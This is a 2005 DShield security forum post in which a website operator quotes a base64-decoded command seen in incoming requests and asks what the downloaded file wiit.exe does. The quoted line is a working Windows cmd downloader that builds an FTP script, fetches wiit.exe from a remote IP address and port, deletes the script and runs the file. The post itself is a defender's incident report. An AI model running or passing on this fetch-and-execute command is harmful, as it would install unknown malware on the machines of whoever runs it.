[Dshield] Anyone seen wiit.exe?
forum at dshield.org
Mon Aug 29 20:20:56 GMT 2005
Over about the past two weeks or so I have noticed the following being base64 encoded in the URI of some incoming requests to my site...
cmd /k echo open 220.127.116.11 17113 > o&echo user 1 1 >> o &echo get wiit.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &wiit.exe
I have seen this activity before but with different filenames being called out. I don't recall seeing the wiit.exe or know exactly what it is supposed to be doing. Has anyone seen this or know what it is supposed to be doing once executed?
This message was sent via the web forum at
More information about the list